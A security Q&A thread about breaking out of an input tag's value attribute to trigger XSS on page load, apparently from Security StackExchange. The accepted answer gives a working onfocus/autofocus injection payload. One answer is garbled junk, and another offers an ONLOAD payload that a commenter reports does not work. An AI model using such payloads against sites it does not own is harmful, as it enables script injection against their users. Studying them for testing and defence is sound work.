# How to launch XSS code from an INPUT HTML tag upon page load?

Tags: xss, html

Say I have the a website with the following code on it:

```
<input type="text" id="search-text" name="query" value="?" />
```

Double quotes aren't escaped so I can break out of the value attribute, however, I can't break out of the HTML tag itself as '<' and `>` are being filtered out.

My goal here is to get a javascript popup to appear.

- There's the `onfocus` attribute so I guess if someone clicked on the text input box a javascript popup could appear.
- However **is there a way to make a javascript popup appear when the page first loads?**

Comment: did you try all the techniques on https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_closing_script_tags ?

Comment: I can't break out of the `<input` tag to start a `<script` tag, let alone not close a `<script` tag I'm already in. I'm not aware of any others that'll help either but if you are aware of one do feel free to post it as the answer..

Comment: What reason would there be for *not* encoding double quotes?

Comment: @Anonymous - ignorance? I didn't write the website that I'm trying to exploit!

Comment: @neubert Oh, I read the phrase *"Say I have the a website"* and assumed you owned it. If not, this fits the close reason *"Questions asking us to break the security of a specific system for you are off-topic unless they demonstrate an understanding of the concepts involved and clearly identify a specific problem."* in my opinion.

Comment: @Anyonous - well them let me create a PoC website that demo's the vulnerability. *Done*. Now...  how do I exploit it? And I do believe I have demonstrated an understanding of the concepts. As I said in my OP I can break out of the attribute but not the tag. Or do you believe that familiarity with the `autofocus` attribute essential to understanding XSS?

Answer (score 60, accepted):

Try this:

```
" onfocus="alert(1)" autofocus="
```

It will expand to:

```
<input type="text" id="search-text" name="query" value="" onfocus="alert(1)" autofocus="" />
```

Which will cause an alert box, demonstrating XSS.

Comment: Is there also any event which works with input type=hidden?

Comment: @SanchitSharma See this question: https://security.stackexchange.com/q/182762/91506

Answer (score 0):

Hyyyyyygg
alert("xss")alert("xss")alert("xss")alert("xss")</svg onResize></svg onResize></svg onResize></svg onResize></svg onResize>

Answer (score -3):

You can checkout for this too

ONLOAD=alert('XSS')

Which will produce an alert box when the page loads.

Comment: Didn't work for me. Nor would I expect it to. onload isn't valid for `input type="text"` per http://www.w3schools.com/jsref/event_onload.asp